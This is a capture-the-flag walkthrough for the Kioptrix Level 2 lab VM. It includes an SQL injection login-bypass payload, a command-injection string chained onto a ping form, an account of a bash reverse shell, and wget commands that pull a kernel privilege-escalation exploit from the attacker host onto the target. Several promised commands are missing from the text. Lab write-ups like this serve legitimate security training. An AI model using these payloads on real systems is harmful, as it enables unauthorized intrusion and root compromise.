Professional Documents
Culture Documents
vn
Start your Kioptrix1.1 Level 2 VM Machine and you’ll get the similar below image which
prompt some kind of login and your task is to get into root shell and access all the files.
So your first part is to get the IP address of this machine which you can easily get it
via netdiscover tool by typing the following command in your terminal.
Note: Make sure that your Kali Linux machine and Kioptrix VM Machine are on same NAT
mode.
@hackermuxam.edu.vn
As you can see that, the following ports are in opened state:
From the initial scanning, it seems that SSH Service is running on Port 22 and Apache service is
also running on Port 80 and Port 443 which is of interesting thing for all os us.
Even more, On port 3306, Mysql Service is also running which means there should be some kind
of DB connectivity so the chances of SQL Injection are very HIGH.
On Port 631, CUPS service is running (Common Unix Printing System) whose version is 1.1. A
quick Google search showed us that CUPS had multiple vulnerabilities.
Let’s also try pulling up the port 80/443 site in a browser which shows some kind of Login page.
So whenever you found any login page, your first step is to bypass it with SQL Injection (String
based). You can try to bypass it with the following payload:
Username – ‘or”=’
Password – ‘or”=’
If you want to learn more about SQL Injection, then I suggest you to read this article by Chetan
Soni.
Perfect! The SQL Injection worked and we are able to access the next page, which seems like a
Ping Command prompt!
We can test this Ping Command prompt by trying to ping our Kali Linux Machine
(192.168.36.128).
@hackermuxam.edu.vn
Okay! It seems that the ping command works and that the php code is executing system
commands. At this point, we can try to see if the php script is vulnerable to Command
Injection.
Back at the main Ping Command page, let’s go ahead and type: 192.168.36.128;ls;id;whoami
What this does, is basically tells the system to run ping against our Kali Linux machine, then run
the ls command, id command and whoami command.
Nice! The script is vulnerable to command injection! Thus, we can go ahead and attempt to
invoke a Reverse Shell.
Let’s start by setting up a Netcat listener on port 1337 by typing the following command in your
Kali Linux machine terminal.
Now, let’s go back to the Ping console on the website and run the following command:
This will basically initiate a reverse TCP connection using bash to the IP address of your
machine (192.168.36.128 in our case), on port 1337.
Perfect! We were able to connect to the victim’s machine, and it seems that we are currently
running as the normal user account. Our next step from here would be to carry out some
Privilege Escalation to be able to get access to the root account.
@hackermuxam.edu.vn
Let’s start by seeing what version of Linux the system is running by typing uname -a command.
After a quick Google search against the Linux Versions we were able to find a Privilege
Escalation exploit called ip_append_data_() Ring0.
Download the exploit in your Kali Linux by typing the following command:
Command: cd /var/www/html/
Command: wget https://www.exploit-db.com/download/9542.c
@hackermuxam.edu.vn
And restart the Apache service so that we can directly transfer the exploit from Kali Linux
machine to Kioptrix machine.
But here’s a small twist: you don’t have any permissions to download any file in root directory
so just move on to /tmp folder and execute the following command:
Command: cd /tmp
Command: wget http://192.168.36.128/9542.c
@hackermuxam.edu.vn
Now its time to compile the exploit with the help of GCC Compiler and give 755 permissions to
the generated file.